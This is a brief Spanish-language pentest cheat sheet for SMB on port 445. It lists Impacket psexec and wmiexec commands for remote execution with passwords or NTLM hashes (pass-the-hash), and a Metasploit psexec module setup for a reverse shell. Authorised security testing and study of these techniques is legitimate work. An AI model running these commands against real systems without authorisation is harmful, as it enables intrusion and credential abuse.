445/TCP (SMB)
SMB, Server Message Block.
Impacket
# impacket-psexec
psexec.py <user>:"<password>"@<target>
psexec.py <ACME.LOCAL>/<user>:"<password>"@<target>
psexec.py <ACME.LOCAL>/<user>@<target> -hashes <hash>
# impacket-wmiexec
wmiexec.py <user>:"<password>"@<target>
wmiexec.py <ACME.LOCAL>/<user>:"<password>"@<target>
wmiexec.py <ACME.LOCAL>/<user>@<target> -hashes <hash><user> = usuario.
<password> = contraseña.
<target> = dirección IP del objetivo.
<hash> =
LMHASH:NTHASH
Metasploit
use exploit/windows/smb/psexec
set RHOSTS <target>
set SMBUser <username>
set SMBPass <password>
runReverse shell
Última actualización
¿Te fue útil?